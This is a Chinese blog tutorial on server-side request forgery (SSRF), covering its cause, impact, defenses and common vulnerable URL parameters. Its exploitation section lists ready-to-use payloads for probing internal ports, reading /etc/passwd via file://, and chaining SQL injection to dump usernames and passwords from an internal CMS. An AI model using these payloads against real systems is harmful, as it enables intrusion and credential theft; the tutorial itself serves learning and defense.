服务端请求伪造(SSRF)

最新推荐文章于 2025-06-05 16:37:54 发布
原创 最新推荐文章于 2025-06-05 16:37:54 发布
· 486 阅读 · 9 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全 #服务器

漏洞概述

服务器会根据用户提交的 URL 发送一个 HTTP 请求。使用用户指定的 URL Web 应用可以获取图片或者文件资源等。典型的例子是百度识图功能。
如果没有对用户提交 URL 和远端服务器所返回的信息做合适的验证或过滤,就有可能存在 请求伪造 的缺陷。 请求伪造 ,顾名思义,攻击者伪造正常的请求,以达到攻击的目的。如果“ 请求伪造 发生在服务器端,那这个漏洞就叫做 服务器端请求伪造 ,英文名字 Server Side Request Forgery ,简称SSRF
SSRF 是一种由攻击者发起的伪造服务器发送的请求的一种攻击。

漏洞原理

  • 服务器接受了来自于客户端的URL 地址,并由服务器发送该URL 请求。
  • 对用户输入的URL 没有进行恰当的过滤,导致任意URL 输入。
  • 没对响应的结果进行检验,直接输出。

漏洞危害

  • 端口扫描;
  • 内网Web 应用指纹识别;
  • 攻击内网应用;
  • 读取本地文件;

SSRF攻防

SSRF利用

文件访问

?url=http://www.baidu.com
?url=http://www.baidu.com/img/bd_logo.png
?url=http://www.baidu.com/robots.txt

端口扫描

?url=http://127.0.0.1:80
?url=http://127.0.0.1:3306
?url=dict://127.0.0.1:3306
?url=http://10.10.10.1:22
?url=http://10.10.10.1:6379

读取本地文件

?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd
?url=file:/c:/www/ssrf/ssrf_curl.php

内网应用指纹识别

<Directory "c:\www\phpMyAdmin">
   #Order allow,deny
   Order deny,allow
   deny from all
   allow from 127.0.0.1

</Directory>

攻击内网Web应用

<Directory "c:\www\cms">
   #Order allow,deny
   Order deny,allow
   deny from all
   allow from 127.0.0.1

</Directory>

通过SSRF 漏洞可以实现对内网的访问,从而可以攻击内网应用。仅仅通过GET 方法可以攻击的内网Web 应用有很多。 

?url=http://127.0.0.1/cms/show.php?
id=-33/*A*/union/*J*/select/*E*/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15/*S*/from/*T*/cms_
users

?url=http://127.0.0.1/cms/show.php?
id=-33%25%32%30union%25%32%30select%25%32%301,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15%25%32
%30from%25%32%30cms_users

SSRF防御

过滤输入

  • 限制协议,仅允许 http https 协议;
  • 限制IP,避免应用被用来获取内网数据,攻击内网;
  • 限制端口,限制请求端口为常用端口。

过滤输出

  • 过滤返回信息,只要不符合要求的,全部过滤;
  • 统一错误信息,让攻击无法对内网信息进行判断。

SSRF挖掘

Web功能URL关键字

分享

转码服务

在线翻译

图片加载与下载

图片、文章收藏功能

...

share

wap

url

link

src

u

display

domain

...

服务器端请求伪造SSRF)漏洞解析
CoffeMilk的博客
09-27 1273
SSRF攻击是通过连接外网的Web服务器与它相连而与外网隔离的内部服务器或系统。 SSRF形成的原因大部分是由于该连通外网的服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。利用该连通外网服务器端存在缺陷的web程序作为代理攻击远程和本地的服务器
技术分享-ueditor漏洞利用&源码分析超详细分析
cc123489ll的博客
06-29 1416
ueditor的漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
网络安全
总柴的博客
01-19 654
文章目录跨站脚本攻击(存储型)跨站伪造请求(CSRF)服务端伪造请求SSRF)用户枚举Robots.txt 文件泄露Cookie未设置Http-only脆弱的js库任意URL跳转登陆地址泄露不安全的http请求方法Webservice接口泄露 跨站脚本攻击(存储型) 风险描述: 某接口功能为用户修改头像等个人信息,由于用户界面中头像的获取来源为用户提交的地址,且未对图片路径userImg变量的参数进行过滤,导致用户可篡改页面,提交任意恶意代码,造成存储型跨站。 修复建议: 修改后台代码,对用户提交的
服务器端请求伪造漏洞
m0_62207482的博客
01-31 1154
严格控制传入参数的内容,校验参数的合法性,便能有效地防御此漏洞。比 如一个加载远程头像的功能点,就应该限制传入的参数必须为网址,而不是IP , 并且校验网址的后缀是否为图片的地址,否则将不予访问。上传头像、加载图片等处理常常会涉及远程加 载的功能,过分信任用户输入,没有做严谨的过滤限制,这也会造成SSRF漏洞, 如图5-15所示。判断是否存在SSRF ,只需在漏洞URL处输入公网服务器的Web应用地址,然 后在公网服务器上监控访问的数据,发现有存在漏洞的IP访问,便说明存在SSRF 漏洞。
Web安全服务端请求伪造漏洞
qq_52358808的博客
09-26 2063
服务端请求伪造(SSRF)漏洞 SSRF(server-side request forgery,服务端请求伪造),是一种由攻击者构造形成由服务器端发起请求的一种漏洞。从客户端发起一个请求服务端服务端再向另外的服务端发起请求的过程称之为服务器端请求。让服务器请求你通常请求不到的东西。一般用来在外网探测或攻击内网服务。 常见类型 有回显:从页面中可以看到返回内容。 无回显:无法从页面中看到返回内容。 SSFRF漏洞1.原理1.1.成因1.2.场景1.3.相关函数2.利用3.危害4.防御 1.原理 .
SSRF服务端请求伪造
saber的博客
10-29 901
全面介绍了服务端请求伪造(SSRF)漏洞及其相关概念、形成原因、危害、检测方法和利用技巧。首先,解释了什么是SSRF,即攻击者通过构造恶意请求,迫使服务器代表攻击者而非正常用户向其他服务器发起请求的漏洞。此漏洞通常允许攻击者访问到原本不可见的内部网络资源,从而造成潜在的安全威胁。
服务端请求伪造SSRF过滤绕过与防护.pdf
05-02
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿...
SSRF服务器请求伪造
没有网络安全就没有国家安全
08-20 973
本篇主要讲解SSRF服务器请求伪造漏洞并复现漏洞和利用,以及如何绕过与防御
SSRF服务端请求伪造漏洞
李火火的安全圈
10-24 1209
SSRF(全称Server-Side Request Forgery),即服务器端请求伪造SSRF是一种由攻击者构造请求服务端发起请求的漏洞。SSRF攻击的目标是外网无法访问的内部系统(服务端可以请求到与自身相连而与外网隔离的内部系统)。SSRF形成的原因是服务端提供了从其他服务器获取数据的功能,但没有对目标地址做过滤与限制,导致攻击者在服务端从指定URL地址获取内部系统的数据(文件、图片等)。
常见漏洞汇总
qq_65150735的博客
10-25 2282
工作中的常见漏洞
Ueditor SSRF漏洞审计
qaq517384的博客
11-18 1881
没啥过滤也没啥需求,一般是张图片就能SSRF,source直接往里传。
DedeCMS_v5.7其他漏洞复现
wutiangui的博客
09-12 754
其中aHR0cDovL3d3dy5iYWlkdS5jb20=是http://www.baidu.com的base64编码。管理员在添加用户购买商品的配送方式时,可能会触发存储型xss。进入后台—>会员—>配货方式设置—>增加一个配货方式。二、后台shops_delivery_存储型XSS。后台modifytmp.inc被写入了新内容。三、sys_verifies后台文件写入。用户在购买商品时会自动弹出配送方式列表。版本:5.7sp1、5.7sp2。访问后发现直接转到百度。
技术分享|ueditor漏洞利用&源码分析超详细分析
baidu_38876334的博客
04-02 5365
ueditor的漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
SSRF服务器端请求伪造
qq_56289291的博客
08-02 1766
服务器端请求伪造SSRFServer-SideRequestForgery)是一个Web安全漏洞,指攻击者诱导服务器将HTTP请求发送到攻击者选择的一个目标上。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。例如通过127.0.0.1就能访问本机,192.168.*.*就能访问内网C段。...
SSRF基础:Gopher协议发送Get和Post请求
weixin_45887311的博客
07-13 6162
为了调试方便,我在win10下安装curl的工具 下载地址:https://curl.haxx.se/download.html 但目前提供的版本已经不支持gopher协议了,所以我千辛万苦找到了7.60的win64版本,支持发送gopher,dict协议 7.60地址:https://wws.lanzous.com/iaV55ekyfjc 点击即可下载 解压后把bin目录加入windows环境变量 一、什么是gopher协议? 定义:Gopher是Inter...
java UDP 模板
wu_android的博客
06-05 705
UDP(User Datagram Protocol)是一种无连接的传输层协议,在 Java 中可以使用 UDP 进行网络编程。
APM32芯得 EP.07 | 探索使用以太网(ETH),搭建一个简单的本地HTTP服务器
cheukyau的博客
06-03 667
本文分享基于APM32系列芯片的ETH模块HTTP服务实现方法。文章详细介绍了HTTP协议特点、LWIP1.4.1的轻量级HTTP服务实现,以及嵌入式Web服务器搭建步骤:1)移植LWIP库;2)使用makefsdata工具转换HTML文件;3)编写httpd_cgi_ssi.c实现SSI和CGI功能,包括ADC数据采集和LED控制;4)配置开发板静态IP地址。实验现象展示了通过网页访问开发板IP地址,实现LED控制和ADC数据采集功能。
仓颉语言---Socket编程
w_zero_one的博客
06-02 980
Socket(套接字)可以被理解为网络上两个进程之间通信的端点。它是网络通信的抽象表示,封装了底层网络协议的复杂性,为应用程序提供了一个简单统一的接口。Socket 编程是一种网络编程范式,它允许不同计算机上的进程通过网络进行通信。这种通信可以发生在同一设备上的不同进程之间,也可以发生在不同地理位置的设备之间。Socket 编程提供了一种标准的方式来实现网络通信,是构建各种网络应用的基础。
网络通信核心概念全解析:从IP地址到TCP/UDP实战
最新发布
ZNing_1的博客
06-05 708
解析网络通信三要素(IP地址、端口号、协议)与TCP/IP五层模型,对比TCP/UDP特性,演示Socket编程实战,并探讨数据封装/解封装流程及性能优化方案(粘包处理、高并发)。理解网络基础架构,构建高效稳定的通信应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值